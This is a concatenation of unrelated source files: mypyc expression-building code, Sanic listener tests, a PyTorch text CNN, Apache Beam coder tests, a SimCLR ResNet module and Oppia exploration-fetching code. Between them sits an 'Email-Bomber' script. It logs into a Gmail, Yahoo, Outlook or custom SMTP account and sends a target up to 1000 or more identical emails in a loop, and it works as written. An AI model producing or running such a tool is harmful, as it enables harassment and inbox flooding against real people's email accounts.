e.operators = [cmp_op]
e.operands[1] = items[0]
# x in []/() -> False
# x not in []/() -> True
elif n_items == 0:
if e.operators[0] == 'in':
return builder.false()
else:
return builder.true()
# TODO: Don't produce an expression when used in conditional context
# All of the trickiness here is due to support for chained conditionals
# (`e1 < e2 > e3`, etc). `e1 < e2 > e3` is approximately equivalent to
# `e1 < e2 and e2 > e3` except that `e2` is only evaluated once.
expr_type = builder.node_type(e)
# go(i, prev) generates code for `ei opi e{i+1} op{i+1} ... en`,
# assuming that prev contains the value of `ei`.
def go(i: int, prev: Value) -> Value:
if i == len(e.operators) - 1:
return transform_basic_comparison(
builder, e.operators[i], prev, builder.accept(e.operands[i + 1]), e.line)
next = builder.accept(e.operands[i + 1])
return builder.builder.shortcircuit_helper(
'and', expr_type,
lambda: transform_basic_comparison(
builder, e.operators[i], prev, next, e.line),
lambda: go(i + 1, next),
e.line)
return go(0, builder.accept(e.operands[0]))
def transform_basic_comparison(builder: IRBuilder,
op: str,
left: Value,
right: Value,
line: int) -> Value:
if (is_int_rprimitive(left.type) and is_int_rprimitive(right.type)
and op in int_comparison_op_mapping.keys()):
return builder.compare_tagged(left, right, op, line)
negate = False
if op == 'is not':
op, negate = 'is', True
elif op == 'not in':
op, negate = 'in', True
target = builder.binary_op(left, right, op, line)
if negate:
target = builder.unary_op(target, 'not', line)
return target
def translate_printf_style_formatting(builder: IRBuilder,
format_expr: Union[StrExpr, BytesExpr],
rhs: Expression) -> Optional[Value]:
tokens = tokenizer_printf_style(format_expr.value)
if tokens is not None:
literals, format_ops = tokens
exprs = []
if isinstance(rhs, TupleExpr):
exprs = rhs.items
elif isinstance(rhs, Expression):
exprs.append(rhs)
if isinstance(format_expr, BytesExpr):
substitutions = convert_format_expr_to_bytes(builder, format_ops,
exprs, format_expr.line)
if substitutions is not None:
return join_formatted_bytes(builder, literals, substitutions, format_expr.line)
else:
substitutions = convert_format_expr_to_str(builder, format_ops,
exprs, format_expr.line)
if substitutions is not None:
return join_formatted_strings(builder, literals, substitutions, format_expr.line)
return None
# Literals
def transform_int_expr(builder: IRBuilder, expr: IntExpr) -> Value:
return builder.builder.load_int(expr.value)
def transform_float_expr(builder: IRBuilder, expr: FloatExpr) -> Value:
return builder.builder.load_float(expr.value)
def transform_complex_expr(builder: IRBuilder, expr: ComplexExpr) -> Value:
return builder.builder.load_complex(expr.value)
def transform_str_expr(builder: IRBuilder, expr: StrExpr) -> Value:
return builder.load_str(expr.value)
def transform_bytes_expr(builder: IRBuilder, expr: BytesExpr) -> Value:
return builder.load_bytes_from_str_literal(expr.value)
def transform_ellipsis(builder: IRBuilder, o: EllipsisExpr) -> Value:
return builder.add(LoadAddress(ellipsis_op.type, ellipsis_op.src, o.line))
# Display expressions
def transform_list_expr(builder: IRBuilder, expr: ListExpr) -> Value:
return _visit_list_display(builder, expr.items, expr.line)
def _visit_list_display(builder: IRBuilder, items: List[Expression], line: int) -> Value:
return _visit_display(
builder,
items,
builder.new_list_op,
list_append_op,
list_extend_op,
line,
True
)
def transform_tuple_expr(builder: IRBuilder, expr: TupleExpr) -> Value:
if any(isinstance(item, StarExpr) for item in expr.items):
# create a tuple of unknown length
return _visit_tuple_display(builder, expr)
# create a tuple of fixed length (RTuple)
tuple_type = builder.node_type(expr)
# When handling NamedTuple et. al we might not have proper type info,
# so make some up if we need it.
types = (tuple_type.types if isinstance(tuple_type, RTuple)
else [object_rprimitive] * len(expr.items))
items = []
for item_expr, item_type in zip(expr.items, types):
reg = builder.accept(item_expr)
items.append(builder.coerce(reg, item_type, item_expr.line))
return builder.add(TupleSet(items, expr.line))
def _visit_tuple_display(builder: IRBuilder, expr: TupleExpr) -> Value:
"""Create a list, then turn it into a tuple."""
val_as_list = _visit_list_display(builder, expr.items, expr.line)
return builder.call_c(list_tuple_op, [val_as_list], expr.line)
def transform_dict_expr(builder: IRBuilder, expr: DictExpr) -> Value:
"""First accepts all keys and values, then makes a dict out of them."""
key_value_pairs = []
for key_expr, value_expr in expr.items:
key = builder.accept(key_expr) if key_expr is not None else None
value = builder.accept(value_expr)
key_value_pairs.append((key, value))
return builder.builder.make_dict(key_value_pairs, expr.line)
def transform_set_expr(builder: IRBuilder, expr: SetExpr) -> Value:
return _visit_display(
builder,
expr.items,
builder.new_set_op,
set_add_op,
set_update_op,
expr.line,
False
)
def _visit_display(builder: IRBuilder,
items: List[Expression],
constructor_op: Callable[[List[Value], int], Value],
append_op: CFunctionDescription,
extend_op: CFunctionDescription,
line: int,
is_list: bool
) -> Value:
accepted_items = []
for item in items:
if isinstance(item, StarExpr):
accepted_items.append((True, builder.accept(item.expr)))
else:
accepted_items.append((False, builder.accept(item)))
result: Union[Value, None] = None
initial_items = []
for starred, value in accepted_items:
if result is None and not starred and is_list:
initial_items.append(value)
continue
if result is None:
result = constructor_op(initial_items, line)
builder.call_c(extend_op if starred else append_op, [result, value], line)
if result is None:
result = constructor_op(initial_items, line)
return result
# Comprehensions
def transform_list_comprehension(builder: IRBuilder, o: ListComprehension) -> Value:
if any(o.generator.is_async):
builder.error('async comprehensions are unimplemented', o.line)
return translate_list_comprehension(builder, o.generator)
def transform_set_comprehension(builder: IRBuilder, o: SetComprehension) -> Value:
if any(o.generator.is_async):
builder.error('async comprehensions are unimplemented', o.line)
return translate_set_comprehension(builder, o.generator)
def transform_dictionary_comprehension(builder: IRBuilder, o: DictionaryComprehension) -> Value:
if any(o.is_async):
builder.error('async comprehensions are unimplemented', o.line)
d = builder.call_c(dict_new_op, [], o.line)
loop_params = list(zip(o.indices, o.sequences, o.condlists))
def gen_inner_stmts() -> None:
k = builder.accept(o.key)
v = builder.accept(o.value)
builder.call_c(dict_set_item_op, [d, k, v], o.line)
comprehension_helper(builder, loop_params, gen_inner_stmts, o.line)
return d
# Misc
def transform_slice_expr(builder: IRBuilder, expr: SliceExpr) -> Value:
def get_arg(arg: Optional[Expression]) -> Value:
if arg is None:
return builder.none_object()
else:
return builder.accept(arg)
args = [get_arg(expr.begin_index),
get_arg(expr.end_index),
get_arg(expr.stride)]
return builder.call_c(new_slice_op, args, expr.line)
def transform_generator_expr(builder: IRBuilder, o: GeneratorExpr) -> Value:
if any(o.is_async):
builder.error('async comprehensions are unimplemented', o.line)
builder.warning('Treating generator comprehension as list', o.line)
return builder.call_c(
iter_op, [translate_list_comprehension(builder, o)], o.line
)
def transform_assignment_expr(builder: IRBuilder, o: AssignmentExpr) -> Value:
value = builder.accept(o.value)
target = builder.get_assignment_target(o.target)
builder.assign(target, value, o.line)
return value
|
the-stack_0_25926
|
import asyncio
import signal
import pytest
from sanic.testing import HOST, PORT
AVAILABLE_LISTENERS = [
"before_server_start",
"after_server_start",
"before_server_stop",
"after_server_stop",
]
skipif_no_alarm = pytest.mark.skipif(
not hasattr(signal, "SIGALRM"),
reason="SIGALRM is not implemented for this platform, we have to come "
"up with another timeout strategy to test these",
)
def create_listener(listener_name, in_list):
async def _listener(app, loop):
print("DEBUG MESSAGE FOR PYTEST for {}".format(listener_name))
in_list.insert(0, app.name + listener_name)
return _listener
def start_stop_app(random_name_app, **run_kwargs):
def stop_on_alarm(signum, frame):
raise KeyboardInterrupt("SIGINT for sanic to stop gracefully")
signal.signal(signal.SIGALRM, stop_on_alarm)
signal.alarm(1)
try:
random_name_app.run(HOST, PORT, **run_kwargs)
except KeyboardInterrupt:
pass
@skipif_no_alarm
@pytest.mark.parametrize("listener_name", AVAILABLE_LISTENERS)
def test_single_listener(app, listener_name):
"""Test that listeners on their own work"""
output = []
# Register listener
app.listener(listener_name)(create_listener(listener_name, output))
start_stop_app(app)
assert app.name + listener_name == output.pop()
@skipif_no_alarm
@pytest.mark.parametrize("listener_name", AVAILABLE_LISTENERS)
def test_register_listener(app, listener_name):
"""
Test that listeners on their own work with
app.register_listener method
"""
output = []
# Register listener
listener = create_listener(listener_name, output)
app.register_listener(listener, event=listener_name)
start_stop_app(app)
assert app.name + listener_name == output.pop()
@skipif_no_alarm
def test_all_listeners(app):
output = []
for listener_name in AVAILABLE_LISTENERS:
listener = create_listener(listener_name, output)
app.listener(listener_name)(listener)
start_stop_app(app)
for listener_name in AVAILABLE_LISTENERS:
assert app.name + listener_name == output.pop()
@pytest.mark.asyncio
async def test_trigger_before_events_create_server(app):
class MySanicDb:
pass
@app.listener("before_server_start")
async def init_db(app, loop):
app.db = MySanicDb()
await app.create_server(debug=True, return_asyncio_server=True, port=PORT)
assert hasattr(app, "db")
assert isinstance(app.db, MySanicDb)
def test_create_server_trigger_events(app):
"""Test if create_server can trigger server events"""
flag1 = False
flag2 = False
flag3 = False
async def stop(app, loop):
nonlocal flag1
flag1 = True
await asyncio.sleep(0.1)
app.stop()
async def before_stop(app, loop):
nonlocal flag2
flag2 = True
async def after_stop(app, loop):
nonlocal flag3
flag3 = True
app.listener("after_server_start")(stop)
app.listener("before_server_stop")(before_stop)
app.listener("after_server_stop")(after_stop)
loop = asyncio.get_event_loop()
serv_coro = app.create_server(return_asyncio_server=True)
serv_task = asyncio.ensure_future(serv_coro, loop=loop)
server = loop.run_until_complete(serv_task)
server.after_start()
try:
loop.run_forever()
except KeyboardInterrupt as e:
loop.stop()
finally:
# Run the on_stop function if provided
server.before_stop()
# Wait for server to close
close_task = server.close()
loop.run_until_complete(close_task)
# Complete all tasks on the loop
signal.stopped = True
for connection in server.connections:
connection.close_if_idle()
server.after_stop()
assert flag1 and flag2 and flag3
|
the-stack_0_25927
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import random
import hyperparams
torch.manual_seed(hyperparams.seed_num)
random.seed(hyperparams.seed_num)
class CNN_Text(nn.Module):
def __init__(self, args):
super(CNN_Text,self).__init__()
self.args = args
V = args.embed_num
D = args.embed_dim
C = args.class_num
Ci = 1
Co = args.kernel_num
Ks = args.kernel_sizes
self.embed = nn.Embedding(V, D)
# print("aaaaaaaa", self.embed.weight)
pretrained_weight = np.array(args.pretrained_weight)
self.embed.weight.data.copy_(torch.from_numpy(pretrained_weight))
# print("bbbbbbbb", self.embed.weight)
self.convs1 = [nn.Conv2d(Ci, Co, (K, D)) for K in Ks]
'''
self.conv13 = nn.Conv2d(Ci, Co, (3, D))
self.conv14 = nn.Conv2d(Ci, Co, (4, D))
self.conv15 = nn.Conv2d(Ci, Co, (5, D))
'''
self.dropout = nn.Dropout(args.dropout)
self.fc1 = nn.Linear(len(Ks)*Co, C)
def conv_and_pool(self, x, conv):
x = F.relu(conv(x)).squeeze(3) #(N,Co,W)
x = F.max_pool1d(x, x.size(2)).squeeze(2)
return x
def forward(self, x):
# print("aa", x)
x = self.embed(x) # (N,W,D)
# print("embed", x)
if self.args.static:
x = Variable(x.data)
# print("var", x)
x = x.unsqueeze(1) # (N,Ci,W,D)
x = [F.relu(conv(x)).squeeze(3) for conv in self.convs1] #[(N,Co,W), ...]*len(Ks)
x = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x] #[(N,Co), ...]*len(Ks)
x = torch.cat(x, 1)
'''
x1 = self.conv_and_pool(x,self.conv13) #(N,Co)
x2 = self.conv_and_pool(x,self.conv14) #(N,Co)
x3 = self.conv_and_pool(x,self.conv15) #(N,Co)
x = torch.cat((x1, x2, x3), 1) # (N,len(Ks)*Co)
'''
x = self.dropout(x) # (N,len(Ks)*Co)
logit = self.fc1(x) # (N,C)
return logit
|
the-stack_0_25928
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for coders that must be consistent across all Beam SDKs.
"""
# pytype: skip-file
import json
import logging
import math
import os.path
import sys
import unittest
from copy import deepcopy
from typing import Dict
from typing import Tuple
import yaml
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import schema_pb2
from apache_beam.runners import pipeline_context
from apache_beam.transforms import userstate
from apache_beam.transforms import window
from apache_beam.transforms.window import IntervalWindow
from apache_beam.typehints import schemas
from apache_beam.utils import windowed_value
from apache_beam.utils.sharded_key import ShardedKey
from apache_beam.utils.timestamp import Timestamp
from apache_beam.utils.windowed_value import PaneInfo
from apache_beam.utils.windowed_value import PaneInfoTiming
STANDARD_CODERS_YAML = os.path.normpath(
os.path.join(
os.path.dirname(__file__), '../portability/api/standard_coders.yaml'))
def _load_test_cases(test_yaml):
"""Load test data from yaml file and return an iterable of test cases.
See ``standard_coders.yaml`` for more details.
"""
if not os.path.exists(test_yaml):
raise ValueError('Could not find the test spec: %s' % test_yaml)
with open(test_yaml, 'rb') as coder_spec:
for ix, spec in enumerate(
yaml.load_all(coder_spec, Loader=yaml.SafeLoader)):
spec['index'] = ix
name = spec.get('name', spec['coder']['urn'].split(':')[-2])
yield [name, spec]
def parse_float(s):
x = float(s)
if math.isnan(x):
# In Windows, float('NaN') has opposite sign from other platforms.
# For the purpose of this test, we just need consistency.
x = abs(x)
return x
def value_parser_from_schema(schema):
def attribute_parser_from_type(type_):
parser = nonnull_attribute_parser_from_type(type_)
if type_.nullable:
return lambda x: None if x is None else parser(x)
else:
return parser
def nonnull_attribute_parser_from_type(type_):
# TODO: This should be exhaustive
type_info = type_.WhichOneof("type_info")
if type_info == "atomic_type":
if type_.atomic_type == schema_pb2.BYTES:
return lambda x: x.encode("utf-8")
else:
return schemas.ATOMIC_TYPE_TO_PRIMITIVE[type_.atomic_type]
elif type_info == "array_type":
element_parser = attribute_parser_from_type(type_.array_type.element_type)
return lambda x: list(map(element_parser, x))
elif type_info == "map_type":
key_parser = attribute_parser_from_type(type_.map_type.key_type)
value_parser = attribute_parser_from_type(type_.map_type.value_type)
return lambda x: dict(
(key_parser(k), value_parser(v)) for k, v in x.items())
elif type_info == "row_type":
return value_parser_from_schema(type_.row_type.schema)
elif type_info == "logical_type":
# In YAML logical types are represented with their representation types.
to_language_type = schemas.LogicalType.from_runner_api(
type_.logical_type).to_language_type
parse_representation = attribute_parser_from_type(
type_.logical_type.representation)
return lambda x: to_language_type(parse_representation(x))
parsers = [(field.name, attribute_parser_from_type(field.type))
for field in schema.fields]
constructor = schemas.named_tuple_from_schema(schema)
def value_parser(x):
result = []
x = deepcopy(x)
for name, parser in parsers:
value = x.pop(name)
result.append(None if value is None else parser(value))
if len(x):
raise ValueError(
"Test data contains attributes that don't exist in the schema: {}".
format(', '.join(x.keys())))
return constructor(*result)
return value_parser
class StandardCodersTest(unittest.TestCase):
_urn_to_json_value_parser = {
'beam:coder:bytes:v1': lambda x: x.encode('utf-8'),
'beam:coder:bool:v1': lambda x: x,
'beam:coder:string_utf8:v1': lambda x: x,
'beam:coder:varint:v1': lambda x: x,
'beam:coder:kv:v1': lambda x,
key_parser,
value_parser: (key_parser(x['key']), value_parser(x['value'])),
'beam:coder:interval_window:v1': lambda x: IntervalWindow(
start=Timestamp(micros=(x['end'] - x['span']) * 1000),
end=Timestamp(micros=x['end'] * 1000)),
'beam:coder:iterable:v1': lambda x,
parser: list(map(parser, x)),
'beam:coder:global_window:v1': lambda x: window.GlobalWindow(),
'beam:coder:windowed_value:v1': lambda x,
value_parser,
window_parser: windowed_value.create(
value_parser(x['value']),
x['timestamp'] * 1000,
tuple([window_parser(w) for w in x['windows']])),
'beam:coder:param_windowed_value:v1': lambda x,
value_parser,
window_parser: windowed_value.create(
value_parser(x['value']),
x['timestamp'] * 1000,
tuple([window_parser(w) for w in x['windows']]),
PaneInfo(
x['pane']['is_first'],
x['pane']['is_last'],
PaneInfoTiming.from_string(x['pane']['timing']),
x['pane']['index'],
x['pane']['on_time_index'])),
'beam:coder:timer:v1': lambda x,
value_parser,
window_parser: userstate.Timer(
user_key=value_parser(x['userKey']),
dynamic_timer_tag=x['dynamicTimerTag'],
clear_bit=x['clearBit'],
windows=tuple([window_parser(w) for w in x['windows']]),
fire_timestamp=None,
hold_timestamp=None,
paneinfo=None) if x['clearBit'] else userstate.Timer(
user_key=value_parser(x['userKey']),
dynamic_timer_tag=x['dynamicTimerTag'],
clear_bit=x['clearBit'],
fire_timestamp=Timestamp(micros=x['fireTimestamp'] * 1000),
hold_timestamp=Timestamp(micros=x['holdTimestamp'] * 1000),
windows=tuple([window_parser(w) for w in x['windows']]),
paneinfo=PaneInfo(
x['pane']['is_first'],
x['pane']['is_last'],
PaneInfoTiming.from_string(x['pane']['timing']),
x['pane']['index'],
x['pane']['on_time_index'])),
'beam:coder:double:v1': parse_float,
'beam:coder:sharded_key:v1': lambda x,
value_parser: ShardedKey(
key=value_parser(x['key']), shard_id=x['shardId'].encode('utf-8'))
}
def test_standard_coders(self):
for name, spec in _load_test_cases(STANDARD_CODERS_YAML):
logging.info('Executing %s test.', name)
self._run_standard_coder(name, spec)
def _run_standard_coder(self, name, spec):
def assert_equal(actual, expected):
"""Handle nan values which self.assertEqual fails on."""
if (isinstance(actual, float) and isinstance(expected, float) and
math.isnan(actual) and math.isnan(expected)):
return
self.assertEqual(actual, expected)
coder = self.parse_coder(spec['coder'])
parse_value = self.json_value_parser(spec['coder'])
nested_list = [spec['nested']] if 'nested' in spec else [True, False]
for nested in nested_list:
for expected_encoded, json_value in spec['examples'].items():
value = parse_value(json_value)
expected_encoded = expected_encoded.encode('latin1')
if not spec['coder'].get('non_deterministic', False):
actual_encoded = encode_nested(coder, value, nested)
if self.fix and actual_encoded != expected_encoded:
self.to_fix[spec['index'], expected_encoded] = actual_encoded
else:
self.assertEqual(expected_encoded, actual_encoded)
decoded = decode_nested(coder, expected_encoded, nested)
assert_equal(decoded, value)
else:
# Only verify decoding for a non-deterministic coder
self.assertEqual(
decode_nested(coder, expected_encoded, nested), value)
def parse_coder(self, spec):
context = pipeline_context.PipelineContext()
coder_id = str(hash(str(spec)))
component_ids = [
context.coders.get_id(self.parse_coder(c))
for c in spec.get('components', ())
]
context.coders.put_proto(
coder_id,
beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.FunctionSpec(
urn=spec['urn'],
payload=spec.get('payload', '').encode('latin1')),
component_coder_ids=component_ids))
return context.coders.get_by_id(coder_id)
def json_value_parser(self, coder_spec):
# TODO: integrate this with the logic for the other parsers
if coder_spec['urn'] == 'beam:coder:row:v1':
schema = schema_pb2.Schema.FromString(
coder_spec['payload'].encode('latin1'))
return value_parser_from_schema(schema)
component_parsers = [
self.json_value_parser(c) for c in coder_spec.get('components', ())
]
return lambda x: self._urn_to_json_value_parser[coder_spec['urn']](
x, *component_parsers)
# Used when --fix is passed.
fix = False
to_fix = {} # type: Dict[Tuple[int, bytes], bytes]
@classmethod
def tearDownClass(cls):
if cls.fix and cls.to_fix:
print("FIXING", len(cls.to_fix), "TESTS")
doc_sep = '\n---\n'
docs = open(STANDARD_CODERS_YAML).read().split(doc_sep)
def quote(s):
return json.dumps(s.decode('latin1')).replace(r'\u0000', r'\0')
for (doc_ix, expected_encoded), actual_encoded in cls.to_fix.items():
print(quote(expected_encoded), "->", quote(actual_encoded))
docs[doc_ix] = docs[doc_ix].replace(
quote(expected_encoded) + ':', quote(actual_encoded) + ':')
open(STANDARD_CODERS_YAML, 'w').write(doc_sep.join(docs))
def encode_nested(coder, value, nested=True):
out = coder_impl.create_OutputStream()
coder.get_impl().encode_to_stream(value, out, nested)
return out.get()
def decode_nested(coder, encoded, nested=True):
return coder.get_impl().decode_from_stream(
coder_impl.create_InputStream(encoded), nested)
if __name__ == '__main__':
if '--fix' in sys.argv:
StandardCodersTest.fix = True
sys.argv.remove('--fix')
unittest.main()
|
the-stack_0_25929
|
import smtplib
import sys
class bColors:
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BLUE = '\033[94m'
def banner():
print(bColors.YELLOW + '<<< Email-Bomber >>>')
# print(bColors.YELLOW + '<<< made with pyCharm >>>')
print(bColors.YELLOW + r'''
_
| |
| |___
| _ \ _ _
| |_) | | (_) |
\____/ \__, |
__/ |
|___/
_ _
| | (_)
____ ____ ___| | ___ _ ______ ______ ___ _ ______ ______ _ _ ____
/ ___\ / \ / _ | / _ | | / _____| / _____| / _ | | / _____| / _____| | | | | | \
| |____ | () | | (_| | | (_|| | \______\ \______\ | (_|| | \______\ \______\ | | | | | |
\____/ \____/ \____/ \___|_| |______/ |______/ \___|_| |______/ |______/ |_| |_| |_|
''')
class EmailBomber:
count = 0
def __init__(self):
self.amount = None
try:
print(bColors.BLUE + '\n[+] Initializing bomber ...')
self.target = str(input(bColors.GREEN + '[:] Enter Target Email > '))
self.mode = int(input(bColors.GREEN + '[:] Enter BOMB mode (1,2,3,4) || 1:(1000) 2:(500) 3:(250) 4:('
'custom) > '))
if int(self.mode) > int(4) or int(self.mode) < int(1):
print(bColors.RED + '[-] ERROR: Invalid Option!')
sys.exit(0)
except Exception as e:
print(bColors.RED + f'[-] ERROR: {e}')
sys.exit(0)
def bomb(self):
try:
print(bColors.BLUE + '\n[+] Setting up bomb ...')
if self.mode == int(1):
self.amount = int(1000)
elif self.mode == int(2):
self.amount = int(500)
elif self.mode == int(3):
self.amount = int(250)
else:
self.amount = int(input(bColors.GREEN + '[:] Choose a CUSTOM amount > '))
print(bColors.GREEN + f'[+] You have selected BOMB mode {self.mode} and {self.amount} emails')
except Exception as e:
print(bColors.RED + f'[-] ERROR: {e}')
sys.exit(0)
def email(self):
try:
print(bColors.BLUE + '\n[+] Setting up email ...')
self.server = str(input(bColors.GREEN + '[:] Enter email server | or select premade options - 1:Gmail '
'2:Yahoo 3:Outlook 4:Custom > '))
defaultPort = True
if self.server == '4':
defaultPort = False
self.port = int(input(bColors.GREEN + '[:] Enter port number > '))
if defaultPort:
self.port = int(587)
if self.server == '1':
self.server = 'smtp.gmail.com'
elif self.server == '2':
self.server = 'smtp.mail.yahoo.com'
elif self.server == '3':
self.server = 'smtp-mail.outlook.com'
self.fromAddr = str(input(bColors.GREEN + '[:] Enter attacker email address > '))
self.fromPwd = str(input(bColors.GREEN + '[:] Enter attacker password > '))
self.subject = str(input(bColors.GREEN + '[:] Enter subject > '))
self.message = str(input(bColors.GREEN + '[:] Enter message > '))
if self.target == self.fromAddr:
print(bColors.RED + '\n[-] ERROR: Can\'t have same Attacker and Target address.')
self.msg = '''From: %s\nTo: %s\nSubject %s\n%s\n
''' % (self.fromAddr, self.target, self.subject, self.message)
self.s = smtplib.SMTP(self.server, self.port)
self.s.ehlo()
self.s.starttls()
self.s.ehlo()
self.s.login(self.fromAddr, self.fromPwd)
except Exception as e:
print(bColors.RED + f'[-] ERROR: {e}')
sys.exit(0)
def send(self):
try:
self.s.sendmail(self.fromAddr, self.target, self.message)
self.count += 1
# print(bColors.YELLOW + f'[+] BOMB: {self.count}')
sys.stdout.write(bColors.YELLOW + '\r' + f'[+] BOMBED {self.count} emails ' + ('.' * self.count))
# time.sleep(0.5)
except Exception as e:
print(bColors.RED + f'[-] ERROR: {e}')
sys.exit(0)
def attack(self):
print(bColors.BLUE + '\n[+] Attacking ...')
for email in range(self.amount):
self.send()
self.s.close()
print(bColors.YELLOW + '\n[+] Attack Finished !!')
sys.exit(0)
if __name__ == '__main__':
banner()
bomb = EmailBomber()
bomb.bomb()
bomb.email()
bomb.attack()
|
the-stack_0_25930
|
import torch.nn as nn
import torchvision.models as models
from exceptions.exceptions import InvalidBackboneError
class ResNetSimCLR(nn.Module):
def __init__(self, base_model, out_dim):
super(ResNetSimCLR, self).__init__()
self.resnet_dict = {"resnet18": models.resnet18(pretrained=False, num_classes=out_dim),
"resnet50": models.resnet50(pretrained=False, num_classes=out_dim),
"mobilev2": models.mobilenet_v2(pretrained=False, num_classes=out_dim),
"squeeznet": models.squeezenet1_1(pretrained=False, num_classes=128)}
self.backbone = self._get_basemodel(base_model)
if base_model == 'mobilev2':
dim_mlp = self.backbone.classifier[1].in_features
elif base_model == 'resnet50':
dim_mlp = self.backbone.fc.in_features
# add mlp projection head
if base_model == 'mobilev2':
self.backbone.classifier[1] = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.backbone.classifier[1])
elif base_model == 'squeeznet':
self.backbone = self.backbone
else:
self.backbone.fc = nn.Sequential(nn.Linear(dim_mlp, dim_mlp), nn.ReLU(), self.backbone.fc)
def _get_basemodel(self, model_name):
try:
model = self.resnet_dict[model_name]
print(f'{model_name} Backbone Selected')
except KeyError:
raise InvalidBackboneError(
"Invalid backbone architecture. Check the config file and pass one of: resnet18 or resnet50")
else:
return model
def forward(self, x):
return self.backbone(x)
|
the-stack_0_25931
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Commands that can be used to fetch exploration related models.
All functions here should be agnostic of how ExplorationModel objects are
stored in the database. In particular, the various query methods should
delegate to the Exploration model class. This will enable the exploration
storage model to be changed without affecting this module and others above it.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import copy
import logging
from core import feconf
from core import python_utils
from core.domain import caching_services
from core.domain import exp_domain
from core.domain import subscription_services
from core.platform import models
(exp_models,) = models.Registry.import_models([models.NAMES.exploration])
datastore_services = models.Registry.import_datastore_services()
def _migrate_states_schema(versioned_exploration_states, init_state_name):
"""Holds the responsibility of performing a step-by-step, sequential update
of an exploration states structure based on the schema version of the input
exploration dictionary. This is very similar to the YAML conversion process
found in exp_domain.py and, in fact, many of the conversion functions for
states are also used in the YAML conversion pipeline. If the current
exploration states schema version changes
(feconf.CURRENT_STATE_SCHEMA_VERSION), a new conversion
function must be added and some code appended to this function to account
for that new version.
Args:
versioned_exploration_states: dict. A dict with two keys:
- states_schema_version: int. the states schema version for the
exploration.
- states: the dict of states comprising the exploration. The keys in
this dict are state names.
init_state_name: str. Name of initial state.
Raises:
Exception. The given states_schema_version is invalid.
"""
states_schema_version = versioned_exploration_states[
'states_schema_version']
if not (feconf.EARLIEST_SUPPORTED_STATE_SCHEMA_VERSION
<= states_schema_version
<= feconf.CURRENT_STATE_SCHEMA_VERSION):
raise Exception(
'Sorry, we can only process v%d-v%d exploration state schemas at '
'present.' % (
feconf.EARLIEST_SUPPORTED_STATE_SCHEMA_VERSION,
feconf.CURRENT_STATE_SCHEMA_VERSION))
while (states_schema_version <
feconf.CURRENT_STATE_SCHEMA_VERSION):
exp_domain.Exploration.update_states_from_model(
versioned_exploration_states,
states_schema_version, init_state_name)
states_schema_version += 1
def get_new_exploration_id():
"""Returns a new exploration id.
Returns:
str. A new exploration id.
"""
return exp_models.ExplorationModel.get_new_id('')
def get_multiple_versioned_exp_interaction_ids_mapping_by_version(
exp_id, version_numbers):
"""Returns a list of VersionedExplorationInteractionIdsMapping domain
objects corresponding to the specified versions.
Args:
exp_id: str. ID of the exploration.
version_numbers: list(int). List of version numbers.
Returns:
list(VersionedExplorationInteractionIdsMapping). List of Exploration
domain objects.
Raises:
Exception. One or more of the given versions of the exploration could
not be converted to the latest schema version.
"""
versioned_exp_interaction_ids_mapping = []
exploration_models = exp_models.ExplorationModel.get_multi_versions(
exp_id, version_numbers)
for index, exploration_model in enumerate(exploration_models):
if (exploration_model.states_schema_version !=
feconf.CURRENT_STATE_SCHEMA_VERSION):
raise Exception(
'Exploration(id=%s, version=%s, states_schema_version=%s) '
'does not match the latest schema version %s' % (
exp_id,
version_numbers[index],
exploration_model.states_schema_version,
feconf.CURRENT_STATE_SCHEMA_VERSION
))
states_to_interaction_id_mapping = {}
for state_name in exploration_model.states:
states_to_interaction_id_mapping[state_name] = (
exploration_model.states[state_name]['interaction']['id'])
versioned_exp_interaction_ids_mapping.append(
exp_domain.VersionedExplorationInteractionIdsMapping(
exploration_model.version,
states_to_interaction_id_mapping))
return versioned_exp_interaction_ids_mapping
def get_exploration_from_model(exploration_model, run_conversion=True):
"""Returns an Exploration domain object given an exploration model loaded
from the datastore.
If run_conversion is True, then the exploration's states schema version
will be checked against the current states schema version. If they do not
match, the exploration will be automatically updated to the latest states
schema version.
IMPORTANT NOTE TO DEVELOPERS: In general, run_conversion should never be
False. This option is only used for testing that the states schema version
migration works correctly, and it should never be changed otherwise.
Args:
exploration_model: ExplorationModel. An exploration storage model.
run_conversion: bool. When True, updates the exploration to the latest
states_schema_version if necessary.
Returns:
Exploration. The exploration domain object corresponding to the given
exploration model.
"""
# Ensure the original exploration model does not get altered.
versioned_exploration_states = {
'states_schema_version': exploration_model.states_schema_version,
'states': copy.deepcopy(exploration_model.states)
}
init_state_name = exploration_model.init_state_name
# If the exploration uses the latest states schema version, no conversion
# is necessary.
if (run_conversion and exploration_model.states_schema_version !=
feconf.CURRENT_STATE_SCHEMA_VERSION):
_migrate_states_schema(versioned_exploration_states, init_state_name)
return exp_domain.Exploration(
exploration_model.id, exploration_model.title,
exploration_model.category, exploration_model.objective,
exploration_model.language_code, exploration_model.tags,
exploration_model.blurb, exploration_model.author_notes,
versioned_exploration_states['states_schema_version'],
exploration_model.init_state_name,
versioned_exploration_states['states'],
exploration_model.param_specs, exploration_model.param_changes,
exploration_model.version, exploration_model.auto_tts_enabled,
exploration_model.correctness_feedback_enabled,
created_on=exploration_model.created_on,
last_updated=exploration_model.last_updated)
